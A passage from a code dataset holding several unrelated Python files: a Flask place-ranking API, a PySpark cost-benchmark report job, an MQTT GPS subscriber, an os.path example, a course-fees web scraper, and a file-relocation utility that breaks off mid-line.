return url\n\n\n@cache.cached(timeout=3600 * 24, query_string=True) # Cache for one day.\n@bp.route('/ranking/<path:dcid>')\ndef api_ranking(dcid):\n \"\"\"\n Get the ranking information for a given place.\n \"\"\"\n current_place_type = get_place_type(dcid)\n parents = parent_places(dcid)[dcid]\n parents_str = '^'.join(sorted(map(lambda x: x['dcid'], parents)))\n parent_i18n_names = cached_i18n_name(parents_str, g.locale, False)\n\n selected_parents = []\n parent_names = {}\n for parent in parents:\n parent_dcid = parent['dcid']\n parent_types = parent['types'][0]\n if parent_types == 'Continent':\n continue\n if parent_dcid.startswith('zip'):\n continue\n selected_parents.append(parent_dcid)\n i18n_name = parent_i18n_names[parent_dcid]\n parent_names[parent_dcid] = i18n_name if i18n_name else parent.get(\n 'name', \"\")\n if len(selected_parents) == 3:\n break\n result = collections.defaultdict(list)\n\n # Contains statistical variable and the display name used for place rankings.\n ranking_stats = {\n # TRANSLATORS: Label for rankings of places by size of population (sorted from highest to lowest).\n 'Count_Person': gettext('Largest Population'),\n # TRANSLATORS: Label for rankings of median individual income (sorted from highest to lowest).\n 'Median_Income_Person': gettext('Highest Median Income'),\n # TRANSLATORS: Label for rankings of places by the median age of it's population (sorted from highest to lowest).\n 'Median_Age_Person': gettext('Highest Median Age'),\n # TRANSLATORS: Label for rankings of places by the unemployment rate of it's population (sorted from highest to lowest).\n 'UnemploymentRate_Person': gettext('Highest Unemployment Rate'),\n }\n # Crime stats var is separted from RANKING_STATS as it uses perCapita\n # option.\n # TOOD(shifucun): merge this once https://github.com/datacommonsorg/mixer/issues/262 is fixed.\n crime_statsvar = {\n 'Count_CriminalActivities_CombinedCrime': # TRANSLATORS: Label for rankings of places by the number of combined criminal activities, per capita (sorted from highest to lowest).\n gettext('Highest Crime Per Capita')\n }\n for parent_dcid in selected_parents:\n stats_var_string = '^'.join(ranking_stats.keys())\n response = get_related_place(dcid,\n stats_var_string,\n within_place=parent_dcid)\n for stats_var, data in response.items():\n result[ranking_stats[stats_var]].append({\n 'name':\n parent_names[parent_dcid],\n 'data':\n data,\n 'rankingUrl':\n get_ranking_url(parent_dcid, current_place_type, stats_var,\n dcid)\n })\n response = get_related_place(dcid,\n '^'.join(crime_statsvar.keys()),\n within_place=parent_dcid,\n is_per_capita=True)\n for stats_var, data in response.items():\n result[crime_statsvar[stats_var]].append({\n 'name':\n parent_names[parent_dcid],\n 'data':\n data,\n 'rankingUrl':\n get_ranking_url(parent_dcid,\n current_place_type,\n stats_var,\n dcid,\n is_per_capita=True)\n })\n\n all_labels = list(ranking_stats.values()) + \\\n list(crime_statsvar.values())\n for label in all_labels:\n if label in result:\n result[label] = [x for x in result[label] if 'data' in x]\n result['label'] = [x for x in all_labels if x in result]\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_state_code(dcids):\n \"\"\"Get state codes for a list of places that are state equivalents\n\n Args:\n dcids: ^ separated string of dcids of places that are state equivalents\n\n Returns:\n A dictionary of state codes, keyed by dcid\n \"\"\"\n result = {}\n if not dcids:\n return result\n dcids = dcids.split('^')\n iso_codes = dc.get_property_values(dcids, 'isoCode', True)\n\n for dcid in dcids:\n state_code = None\n iso_code = iso_codes[dcid]\n if iso_code:\n split_iso_code = iso_code[0].split(\"-\")\n if len(split_iso_code\n ) > 1 and split_iso_code[0] == US_ISO_CODE_PREFIX:\n state_code = split_iso_code[1]\n result[dcid] = state_code\n\n return result\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_display_name(dcids, locale=\"en\"):\n \"\"\" Get display names for a list of places. Display name is place name with state code\n if it has a parent place that is a state.\n\n Args:\n dcids: ^ separated string of dcids. It must be a single string for the cache.\n locale: the desired localization language code.\n\n Returns:\n A dictionary of display names, keyed by dcid.\n \"\"\"\n place_names = cached_i18n_name(dcids, locale, True)\n parents = parent_places(dcids)\n dcids = dcids.split('^')\n result = {}\n dcid_state_mapping = {}\n for dcid in dcids:\n for parent_place in parents[dcid]:\n parent_dcid = parent_place['dcid']\n place_types = parent_place['types']\n for place_type in place_types:\n if place_type in STATE_EQUIVALENTS:\n dcid_state_mapping[dcid] = parent_dcid\n break\n result[dcid] = place_names[dcid]\n\n states_lookup = '^'.join(sorted(set(dcid_state_mapping.values())))\n if locale == \"en\":\n state_codes = get_state_code(states_lookup)\n else:\n state_codes = cached_i18n_name(states_lookup, locale, True)\n for dcid in dcid_state_mapping.keys():\n state_code = state_codes[dcid_state_mapping[dcid]]\n if state_code:\n result[dcid] = result[dcid] + ', ' + state_code\n return result\n\n\n@bp.route('/displayname')\ndef api_display_name():\n \"\"\"\n Get display names for a list of places.\n \"\"\"\n dcids = request.args.getlist('dcid')\n result = get_display_name('^'.join((sorted(dcids))), g.locale)\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@bp.route('/places-in')\n@cache.cached(timeout=3600 * 24, query_string=True) # Cache for one day.\ndef get_places_in():\n \"\"\"Gets DCIDs of places of a certain type contained in some places.\n\n Sends the request to the Data Commons \"/node/places-in\" API.\n See https://docs.datacommons.org/api/rest/place_in.html.\n\n Returns:\n Dict keyed by parent DCIDs with lists of child place DCIDs as values.\n \"\"\"\n dcids = request.args.getlist(\"dcid\")\n place_type = request.args.get(\"placeType\")\n return Response(json.dumps(dc.get_places_in(dcids, place_type)),\n 200,\n mimetype='application/json')\n\n\n@bp.route('/places-in-names')\n@cache.cached(timeout=3600 * 24, query_string=True) # Cache for one day.\ndef get_places_in_names():\n \"\"\"Gets names of places of a certain type contained in a place.\n\n Returns:\n Dicts keyed by child place DCIDs with their names as values.\n \"\"\"\n dcid = request.args.get(\"dcid\")\n place_type = request.args.get(\"placeType\")\n child_places = dc.get_places_in([dcid], place_type)[dcid]\n return Response(json.dumps(get_name(child_places)),\n 200,\n mimetype='application/json')\n","sub_path":"server/routes/api/place.py","file_name":"place.py","file_ext":"py","file_size_in_byte":24104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"397771512","text":"import sys\r\nfrom pyspark import SparkConf\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.types import *\r\nfrom pyspark.sql import functions as F\r\n\r\nlocation = 'gs://data-discovery/projects/cost_benchmark/phase_3/'\r\n\r\n# Customer Input Type: can be either 1, 2, or 3, corresponding to upload list of customers, upload list of hierarchies, and customer attribute selection, respectively\r\ncustomer_option = sys.argv[1]\r\n\r\n# List of customer attributes for filtering eligibility files as an alternative to uploading a customer file.\r\ncustomer_attributes = sys.argv[2].split('|')\r\n\r\n# Type of customer eligibilities to include: must be a string of 4 digits, each is either 1 or 0, representing whether or not to include that type of eligibility\r\neligibility_options = sys.argv[3]\r\n\r\n# Which reports to include: must be a string of 4 digits, each is either 1 or 0, representing whether or not to include that report\r\nreport_options = sys.argv[4]\r\n\r\n# Name of the customer or hierarchy file that is uploaded to Google Cloud Storage folder (gs://data-discovery/projects/cost_benchamrk/phase_3/input_files/)\r\ncustomer_file = sys.argv[5]\r\n\r\n# Name of the material file that is uploaded to Google Cloud Storage folder (gs://data-discovery/projects/cost_benchmark/phase_3/input_files/)\r\nmaterial_file = sys.argv[6]\r\n\r\n# Name of the unique Project ID\r\nproject_id = sys.argv[7]\r\n\r\nprint(sys.argv)\r\n\r\n# Declare a SparkSession\r\nconf = SparkConf()\r\nspark = SparkSession.builder.enableHiveSupport().getOrCreate()\r\n\r\ndef create_customer_attributes_dict(customer_attributes_list):\r\n\toutput = {'vertical_market': [],'customer_market': [],'customer_submarket': [],'cot': [],'district': [],'zone': [],'sales_office': [] }\r\n\tprint(customer_attributes_list)\r\n\tfor item in customer_attributes_list:\r\n\t\titem = item.split(':')\r\n\t\r\n\t\toutput[item[0]].append(item[1])\r\n\treturn output\r\n\r\ndef filter_by_attributes(eligibility_list, customer_attributes_dict):\r\n\tprint(customer_attributes_dict)\r\n\t\r\n\toutput_df = (eligibility_list\r\n\t\t.filter(eligibility_list['sales_office_vkbur'].isin(customer_attributes_dict['sales_office']))\r\n\t\t.filter(eligibility_list['vertical_mkt_desc'].isin(customer_attributes_dict['vertical_market']))\r\n\t\t.filter(eligibility_list['customer_market_description'].isin(customer_attributes_dict['customer_market']))\r\n\t\t.filter(eligibility_list['customer_submarket_description'].isin(customer_attributes_dict['customer_submarket']))\r\n\t\t.filter(eligibility_list['cot_desc'].isin(customer_attributes_dict['cot']))\r\n\t\t.filter(eligibility_list['district_name_bztxt'].isin(customer_attributes_dict['district']))\r\n\t\t.filter(eligibility_list['zone_zzone'].isin(customer_attributes_dict['zone']))\r\n\t\t.drop('vertical_mkt_desc')\r\n\t\t.drop('customer_market_description')\r\n\t\t.drop('customer_submarket_description')\r\n\t\t.drop('cot_desc')\r\n\t\t.drop('district_name_bztxt')\r\n\t\t)\r\n\treturn output_df\r\n\r\ndef filter_by_customer_eligibility(customer_eligibility):\r\n\tpossible_options = ['Customer','Hierarchy','COT/District','COT/Sales Office']\r\n\tselected_options = []\r\n\tfor x in range(4):\r\n\t\tif eligibility_options[x] == '1':\r\n\t\t\tselected_options.append(possible_options[x])\r\n\treturn customer_eligibility.filter(customer_eligibility.customer_eligibility_type.isin(selected_options))\r\n\r\ndef generate_material_summary(long_report, material_list):\r\n\t\"\"\"\r\n\tAggregates the raw SPA report to a material level, finds min, avg, and max SPA costs, adds into-stock costs from MBEW, and descriptive columns from descriptions table\r\n\t\"\"\"\r\n\tselected_locations = long_report.groupby('delivering_plant_vwerk').count().drop('count')\r\n\r\n\tmbew = spark.read.parquet(location + 'extracts/stock_cost_table')\r\n\tmbew_filtered = mbew.join(selected_locations, mbew.plant_werks == selected_locations.delivering_plant_vwerk, 'inner')\r\n\r\n\tdescriptions = spark.read.parquet(location + 'extracts/material_description_table')\r\n\tfiltered_descriptions = material_list.join(descriptions, \"material_matnr\", 'left_outer')\r\n\r\n\t#Standardize the 'pricing_unit_kpein' (UOM) field so that there is only one UOM for each material, and then find min, avg, max SPA costs\r\n\t#This UOM standardization process can possibly be moved to material_eligibility_etl.py to reduce job run time.\r\n\ttemp_table = long_report.groupby('material_matnr','pricing_unit_kpein').count()\r\n\ttemp_table2 = temp_table.groupby('material_matnr').max('count')\r\n\ttemp_table3 = temp_table.join(temp_table2, 'material_matnr')\r\n\tcommon_per_table = temp_table3.filter(temp_table3['count'] == temp_table3['max(count)']).groupby('material_matnr').max('pricing_unit_kpein').select(F.col('max(pricing_unit_kpein)').alias('common_per_SPA'), 'material_matnr')\r\n\t# Add the new standardized common per back into the long report\r\n\tlong_report_common_per = long_report.join(common_per_table, 'material_matnr')\r\n\tlong_report_common_per = long_report_common_per.withColumn('net_rate', long_report_common_per['net_rate'] / long_report_common_per['pricing_unit_kpein'] * long_report_common_per['common_per_SPA'])\r\n\t# Find min, average\r\n\tagg_report = long_report_common_per.groupby('material_matnr','common_per_SPA').agg(F.countDistinct('sales_deal_knumaag'), F.min('net_rate'), F.avg('net_rate'), F.max('net_rate'), F.countDistinct('net_rate'))\r\n\tagg_report_and_desc = filtered_descriptions.join(agg_report, 'material_matnr', 'left_outer')\r\n\tstock_costs = material_list.select('material_matnr').join(mbew_filtered, 'material_matnr').groupby('material_matnr', 'common_per_stock').agg(F.min('standard_price_stprs'), F.avg('standard_price_stprs'), F.max('standard_price_stprs'))\r\n\tmaterial_summary_report = agg_report_and_desc.join(stock_costs, 'material_matnr', 'left_outer')\r\n\r\n\tcolumn_order = ['material_matnr',\r\n\t\t'supplier_name',\r\n\t\t'supplier_num',\r\n\t\t'supplier_status',\r\n\t\t'product_hierarchy',\r\n\t\t'vendor_hierarchy_1',\r\n\t\t'vendor_hierarchy_2',\r\n\t\t'vendor_hierarchy_3',\r\n\t\t'mfrpn',\r\n\t\t'mfrpn_abbreviated',\r\n\t\t'material_desc',\r\n\t\t'material_grp_desc',\r\n\t\t'material_grp_num',\r\n\t\t'material_type',\r\n\t\t'natl_dno_code',\r\n\t\t't3_cost',\r\n\t\t'l_cost',\r\n\t\t'a_cost',\r\n\t\t'b_cost',\r\n\t\t'sd_cost',\r\n\t\t'natl_net_cost',\r\n\t\t'slab_uom',\r\n\t\t'min(standard_price_stprs)',\r\n\t\t'avg(standard_price_stprs)',\r\n\t\t'max(standard_price_stprs)',\r\n\t\t'common_per_stock',\r\n\t\t'top_item',\r\n\t\t'upc',\r\n\t\t'count(DISTINCT sales_deal_knumaag)',\r\n\t\t'count(DISTINCT net_rate)',\r\n\t\t'min(net_rate)',\r\n\t\t'avg(net_rate)',\r\n\t\t'max(net_rate)',\r\n\t\t'common_per_SPA']\r\n\tmaterial_summary_report = material_summary_report.select(*column_order)\r\n\r\n\treturn material_summary_report\r\n\r\ndef generate_customer_report(long_report):\r\n\t\"\"\"\r\n\tAggregates the raw SPA report to a customer level and adds some addition customer data\r\n\t\"\"\"\r\n\tagg_report = long_report.groupby('customer_kunnr','sales_office_vkbur','customer_classific_kukla','customer_market_zzmarket','customer_submarket_zzsubmarket','delivering_plant_vwerk','name_name1','sales_district_bzirk','vertical_mkt_attrib_zzbran6').count().drop('count')\r\n\tvalues_location = location + 'extracts/'\r\n\tvalues_schema = StructType([\r\n\t\tStructField('name',StringType(),True),\r\n\t\tStructField('value',StringType(),True)])\r\n\tcot_values = spark.read.schema(values_schema).csv(values_location + 'cot_values.csv')\r\n\tvertical_mkt_values = spark.read.schema(values_schema).csv(values_location + 'vertical_mkt_values.csv')\r\n\tcustomer_mkt_values = spark.read.schema(values_schema).csv(values_location + 'customer_mkt_values.csv')\r\n\tcustomer_submkt_values = spark.read.schema(values_schema).csv(values_location + 'customer_submkt_values.csv')\r\n\tdistrict_values = spark.read.schema(values_schema).csv(values_location + 'district_values.csv')\r\n\tagg_report = agg_report.join(cot_values.withColumnRenamed('name','class_of_trade'), agg_report.customer_classific_kukla == cot_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(vertical_mkt_values.withColumnRenamed('name','vertical_market'), agg_report.vertical_mkt_attrib_zzbran6 == vertical_mkt_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(customer_mkt_values.withColumnRenamed('name','customer_market'), agg_report.customer_market_zzmarket == customer_mkt_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(customer_submkt_values.withColumnRenamed('name','customer_submarket'), agg_report.customer_submarket_zzsubmarket == customer_submkt_values.value, 'left_outer').drop('value')\r\n\tagg_report = agg_report.join(district_values.withColumnRenamed('name','district'), agg_report.sales_district_bzirk == district_values.value, 'left_outer').drop('value')\r\n\tcustomer_report = agg_report.drop('sales_district_bzirk','customer_submarket_zzsubmarket','customer_classific_kukla','vertical_mkt_attrib_zzbran6','customer_market_zzmarket')\r\n\treturn customer_report\r\n\r\ndef generate_material_agreement_report(long_report):\r\n\t\"\"\"\r\n\tAggregates the raw SPA report to an aggreement level (omits the customer field)\r\n\t\"\"\"\r\n\treturn long_report.groupby('condition_type_desc',\r\n\t\t'condition_type_kschl',\r\n\t\t'eligibility_type',\r\n\t\t'description_botext',\r\n\t\t'external_description_abrex',\r\n\t\t'material_matnr',\r\n\t\t'valid_from_datab',\r\n\t\t'valid_to_datbi',\r\n\t\t'percentage',\r\n\t\t'price',\r\n\t\t'price_list_pltypd',\r\n\t\t'pricing_unit_kpein',\r\n\t\t'sales_deal_knumaag',\r\n\t\t'net_rate').count().drop('count')\r\n\r\ndef generate_long_report(long_report):\r\n\t\"\"\"\r\n\tRenames the fields of the raw long report so that it is ready for consumptioni\r\n\t\"\"\"\r\n\tlong_report = long_report.selectExpr('condition_type_desc as condition_type_description',\r\n\t\t'condition_type_kschl as condition_type',\r\n\t\t'customer_kunnr as customer_number',\r\n\t\t'eligibility_type',\r\n\t\t'material_matnr as material_number',\r\n\t\t'valid_from_datab',\r\n\t\t'valid_to_datbi',\r\n\t\t'net_rate as spa_rate',\r\n\t\t'percentage as percent_discount',\r\n\t\t'price',\r\n\t\t'price_list_pltypd as price_list',\r\n\t\t'pricing_unit_kpein as uom',\r\n\t\t'sales_deal_knumaag as agreement_number',\r\n\t\t'external_description_abrex as external_description',\r\n\t\t'description_botext as description')\r\n\treturn long_report\r\n\r\ndef generate_customers_from_hierarchies(hierarchy_list):\r\n\t\"\"\"\r\n\tAccepts a list of hierarchy numbers and returns a list of customer numbers\r\n\t\"\"\"\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('_c0','input_lvl_1')\r\n\thierarchy_list = hierarchy_list.withColumn('input_lvl_1', F.lpad(hierarchy_list['input_lvl_1'],10,'0'))\r\n\r\n\tpricing_hierarchy = spark.read.parquet(location + 'extracts/pricing_hierarchy_table')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_1 == pricing_hierarchy.higherlevel_customer_hkunnr, 'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_2')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_2 == pricing_hierarchy.higherlevel_customer_hkunnr, 'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_3')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_3 == pricing_hierarchy.higherlevel_customer_hkunnr, 'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_4')\r\n\r\n\thierarchy_list = (hierarchy_list.join(pricing_hierarchy, hierarchy_list.input_lvl_4 == pricing_hierarchy.higherlevel_customer_hkunnr, 'left_outer')\r\n\t\t.drop('higherlevel_customer_hkunnr'))\r\n\thierarchy_list = hierarchy_list.withColumnRenamed('customer_kunnr','input_lvl_5')\r\n\r\n\r\n\r\n\tdef pick_highest_hierarchy(input_1,input_2,input_3,input_4,input_5):\r\n\t\tif(input_5):\r\n\t\t\treturn input_5\r\n\t\telif(input_4):\r\n\t\t\treturn input_4\r\n\t\telif(input_3):\r\n\t\t\treturn input_3\r\n\t\telif(input_2):\r\n\t\t\treturn input_2\r\n\t\telse:\r\n\t\t\treturn input_1\r\n\thierarchy_selector_UDF = F.udf(pick_highest_hierarchy, StringType())\r\n\thierarchy_list = hierarchy_list.withColumn('customer_kunnr',hierarchy_selector_UDF(hierarchy_list.input_lvl_1, hierarchy_list.input_lvl_2, hierarchy_list.input_lvl_3, hierarchy_list.input_lvl_4, hierarchy_list.input_lvl_5))\r\n\t\r\n\treturn hierarchy_list.selectExpr('customer_kunnr as _c0')\r\n\r\n# Create a dataframe to hold the list of customers\r\nif(customer_option == '1'):\r\n\tcustomer_input = spark.read.csv(\"gs://data-discovery/\" + customer_file)\r\n\t\r\nelif(customer_option == '2'):\r\n\tcustomer_input = generate_customers_from_hierarchies(spark.read.csv(\"gs://data-discovery/\" + customer_file))\r\n\t\r\n\r\n# Combine all of the eligibility files into one dataframe\r\ncustomer_eligibility = filter_by_customer_eligibility(spark.read.parquet(location + 'eligibility_files/customer_eligibility_table'))\r\n\r\n\r\n# Filter the eligibility dataframe to the relevant customers\r\nif(customer_option == '1' or customer_option == '2'):\r\n\tpadded_customer_input = customer_input.withColumn('customer_kunnr', F.lpad(customer_input['_c0'],10,'0')).drop('_c0')\r\n\r\n\t\r\n\tcustomer_eligibility = (customer_eligibility\r\n\t\t.drop('vertical_mkt_desc')\r\n\t\t.drop('customer_market_description')\r\n\t\t.drop('customer_submarket_description')\r\n\t\t.drop('cot_desc')\r\n\t\t.drop('district_name_bztxt')\r\n\t\t)\r\n\r\n\tfiltered_eligibility = customer_eligibility.join(F.broadcast(padded_customer_input), 'customer_kunnr')\r\n\r\nelse:\r\n\tcustomer_attributes_dict = create_customer_attributes_dict(customer_attributes)\r\n\tfiltered_eligibility = filter_by_attributes(customer_eligibility, customer_attributes_dict)\r\n\r\n# Create a dataframe to hold the list of materials\r\nmaterial_input = spark.read.schema(StructType([\r\n\t\tStructField('material_matnr',StringType(),True)])).csv(\"gs://data-discovery/\" + material_file)\r\n\r\n# Add primary keys to material list\r\nmaterial_input_with_id = material_input.withColumn(\"id\", F.monotonically_increasing_id())\r\n\r\n#Create a dataframe to hold the material eligility table\r\nmaterial_eligibility = spark.read.parquet(location + 'eligibility_files/material_eligibility_table')\r\n\r\n#Add leading zeros to material input file so it can join with material_eligibility table\r\nmaterial_input = material_input.withColumn(\"material_matnr\", F.lpad(material_input[\"material_matnr\"],18,\"0\"))\r\n\r\n#Filter elgibility files to the relevant materials\r\nfiltered_agreements = material_eligibility.join(F.broadcast(material_input), \"material_matnr\")\r\n\r\nlong_report = filtered_agreements.join(filtered_eligibility, \"sales_deal_knumaag\")\r\n\r\n\r\n# Based on user input, call the appropriate methods to generate each type of report\r\nif report_options[0] == '1':\r\n\tmaterial_summary = generate_material_summary(long_report, material_input)\r\n\r\n\tmaterial_summary.coalesce(32).write.csv(location + 'output_files/' + project_id + '_material_summary', mode=\"overwrite\", compression=\"none\")\r\n\r\nif report_options[1] == '1':\r\n\tcustomer_report = generate_customer_report(long_report)\r\n\t\r\n\tcustomer_report.coalesce(32).write.csv(location + 'output_files/' + project_id + '_customer_report', mode=\"overwrite\", compression=\"none\")\r\n\r\nif report_options[2] == '1':\r\n\tmaterial_agreement_report = generate_material_agreement_report(long_report)\r\n\t\r\n\tmaterial_agreement_report.coalesce(32).write.csv(location + 'output_files/' + project_id + '_material_agreement_report_condensed', mode=\"overwrite\", compression=\"none\")\r\n\r\nif report_options[3] == '1':\r\n\tlong_report_final = generate_long_report(long_report)\r\n\t\r\n\tlong_report_final.coalesce(32).write.csv(location + 'output_files/' + project_id + '_material_agreement_report_long', mode=\"overwrite\", compression=\"none\")\r\n\r\n","sub_path":"cost_benchmark_gcp.py","file_name":"cost_benchmark_gcp.py","file_ext":"py","file_size_in_byte":15402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339362801","text":"import joblib\nimport datetime\nimport time\nimport json\nimport serial\nimport io\nimport paho.mqtt.client as mqtt\nfrom ubx import UBXManager\n\n\n\n\n\n\n# # 當地端程式連線伺服器得到回應時,要做的動作\n# def on_connect(client, userdata, flags, rc):\n# print(\"Connected with result code \"+str(rc))\n\n# # 將訂閱主題寫在on_connet中\n# # 如果我們失去連線或重新連線時\n# # 地端程式將會重新訂閱\n# client.subscribe(\"gps\")\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # 將訂閱主題寫在on_connet中\n # 如果我們失去連線或重新連線時\n # 地端程式將會重新訂閱\n # client.subscribe(\"gps\")\n\n client.subscribe(\"gps/a0\")\n client.subscribe(\"gps/a1\")\n client.subscribe(\"gps/a2\")\n client.subscribe(\"gps/a3\")\n\n\ndef readGps(gpsQue):\n def on_message(client, userdata, msg):\n # print('msg:',msg.topic)\n bio = io.BytesIO(msg.payload)\n obj = joblib.load(bio)\n anchor_list = gpsQue[0]\n if msg.topic == \"gps/a0\":\n anchor_list[0] = obj\n gpsQue.append(anchor_list)\n # print(obj)\n \n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(\"192.168.0.106\", 1883, 60)\n\n client.loop_forever()\n\n","sub_path":"tag/mqtt_sub.py","file_name":"mqtt_sub.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"230835426","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# ospath_dirname.py\nimport os.path\nPATHS = [\n '/one/two/three',\n '/one/two/three/',\n '/',\n '',\n]\nfor path in PATHS:\n print('{!r:>17}:{}'.format(path, os.path.dirname(path)))\n","sub_path":"TheFileSystem/ospath_dirname.py","file_name":"ospath_dirname.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"1839037","text":"from bs4 import BeautifulSoup\nimport re\nimport requests\nurl =\"http://www.reading.ac.uk/ready-to-study/study/subject-area/modern-languages-and-european-studies-ug/ba-spanish-and-history.aspx\"\nres = requests.get(url).text\nsoup = BeautifulSoup(res, 'lxml')\n\ncourse_data ={}\nfees_div = soup.find('div', class_='Fees hiddenContent pad-around-large tabcontent').find_all('p')\nprint(fees_div)\nfor d in fees_div:\n print(d.text.split('students: ', 1)[-1].strip('* | '))\n\n\n # course_data['Fees'] = fees_list\n # print('fees : ', fees_list)\n","sub_path":"scrapy_projt/soup_scrapy/b_soup_view_source.py","file_name":"b_soup_view_source.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"523591092","text":"import os\r\nimport re\r\nimport shutil\r\n\r\nclass FileMoverToRoot(object):\r\n\r\n def __init__(self, rp):\r\n assert isinstance(rp, str)\r\n self.__CONST_ROOT_PATH = rp\r\n # 구조: key : 원 파일이름 value: 라벨의 정수 값들의 대한 리스트\r\n self.__parsedFileNameDict = dict()\r\n self.__CONST_LABEL_EXP = '(((\\([0-9]+\\))(\\..*)?))$'\r\n self.__CONST_EXT_EXP = '(\\.[^.]+)$'\r\n\r\n # 라벨을 가지고 있는가?\r\n def __hasLabel(self, fn):\r\n assert isinstance(fn, str)\r\n p = re.compile(self.__CONST_LABEL_EXP)\r\n ps = p.search(fn)\r\n if ps is not None and ps.group(3):\r\n #print('hasLabel called', p.search(fn).group(3))\r\n return True\r\n else:\r\n #print('hasLabel return false')\r\n return False\r\n\r\n # 라벨 안에 있는 숫자의 위치 반환\r\n # 괄호 안에 들어가는 숫자 위치 포함, 닫히는 괄호 위치 까지 포함\r\n def __findLabelNumPos(self, fn):\r\n assert isinstance(fn, str)\r\n p = re.compile(self.__CONST_LABEL_EXP)\r\n s = p.search(fn)\r\n if s is not None:\r\n # print('findLabelNumPos called', s.group(3))\r\n return p.search(fn).start(3) + 1, p.search(fn).end(3) - 1\r\n else:\r\n # print('findLabelNumPos return none')\r\n return None, None\r\n\r\n # 라벨에서 정수 값을 반환\r\n def __getLabelNum(self, fn):\r\n assert isinstance(fn, str)\r\n if self.__hasLabel(fn):\r\n lbns, lbne = self.__findLabelNumPos(fn)\r\n return int(fn[lbns:lbne])\r\n else:\r\n return None\r\n\r\n # 확장자의 위치를 반환\r\n def __findExtPos(self, fn):\r\n assert isinstance(fn, str)\r\n p = re.compile(self.__CONST_EXT_EXP)\r\n s = p.search(fn)\r\n # print('findExtPos called', s)\r\n if s is not None:\r\n return p.search(fn).start()\r\n else:\r\n return None\r\n\r\n # 파일 명에 확장자가 존재하는가?\r\n def __hasExt(self, fn):\r\n assert isinstance(fn, str)\r\n p = re.compile(self.__CONST_EXT_EXP)\r\n s = p.search(fn)\r\n if s is None:\r\n return False\r\n else:\r\n return True\r\n\r\n # 파일 확장자 추출기\r\n def __extractExt(self, fn):\r\n assert isinstance(fn, str)\r\n if self.__hasExt(fn):\r\n # return os.path.splitext(fn)[-1]\r\n return fn[self.__findExtPos(fn):]\r\n else: return ''\r\n\r\n # 라벨을 제거한 이름 출력기\r\n def __uniqFileNameParser(self, fn):\r\n assert isinstance(fn, str)\r\n if not self.__hasLabel(fn):\r\n return fn\r\n else:\r\n lbStartPos, lbEndPos = self.__findLabelNumPos(fn)\r\n # print('uniqFileNameParser', fn[:lbStartPos - 1] + fn[lbEndPos + 1:])\r\n return fn[:lbStartPos - 1] + fn[lbEndPos + 1:]\r\n\r\n # 파싱된 파일명이 중복되는가?\r\n def __isDuplicatedName(self, pfn):\r\n # self.__parsedFileNameDict = ['a','a.txt']\r\n assert isinstance(pfn, str)\r\n if pfn in self.__parsedFileNameDict:\r\n return True\r\n else:\r\n return False\r\n\r\n # ===========알고리즘==================\r\n # 1. 루트 경로인가?\r\n # 1.1 (Y) 기억만 한다.\r\n # 1.2 (N) 파일 이름이 중복 되는가?\r\n # 1.2.1 (Y) 라벨이 존재하는가?\r\n # 1.2.1.1 (Y) 라벨 숫자만 max+1 갱신 뒤 기억\r\n # 1.2.1.2 (N) max+1 인 라벨을 생성 뒤 기억\r\n # 1.2.2 (N) 파일을 옮기고, 기억 한다.\r\n\r\n # 파일을 설정된 루트로 이동시킨다\r\n def moveFilesToRoot(self):\r\n for (path, dir, files) in os.walk(self.__CONST_ROOT_PATH):\r\n # 모든 파일에 대하여 파일 이름들은\r\n for filename in files:\r\n # 확장자 추출\r\n ext = self.__extractExt(filename)\r\n # 규칙: 파일이름(숫자).확장자 는 파일이름.확장자 와 같은 이름으로 간주한다.\r\n # 라벨을 제거한 파일명을 반환한다.\r\n parsedFileName = self.__uniqFileNameParser(filename)\r\n print(parsedFileName, self.__getLabelNum(filename))\r\n # 1.파일이 루트 경로에 있지 않을 때, (이미 중복 체크가 되어 있으므로)\r\n # 2.파일 이름 자체가 중복될때,\r\n if not path == self.__CONST_ROOT_PATH and self.__isDuplicatedName(parsedFileName):\r\n # 라벨 위치를 탐색을 시도\r\n lbns, lbne = self.__findLabelNumPos(filename)\r\n # 지금까지 기억한 라벨 정수 값 중 최대값 + 1\r\n lbCnt = max(self.__parsedFileNameDict[parsedFileName]) + 1\r\n # 파일 명에 라벨이 존재하지 않으면\r\n if lbns is None or lbne is None:\r\n # 확장자가 존재하면\r\n if self.__hasExt(filename):\r\n # 확장자 위치를 고려하여 정수 업데이트\r\n extPos = self.__findExtPos(filename)\r\n renamedFileName = filename[:extPos] + '(' + str(lbCnt) + ')' + filename[extPos:]\r\n # 확장자가 존재하지 않으면\r\n else:\r\n renamedFileName = filename + 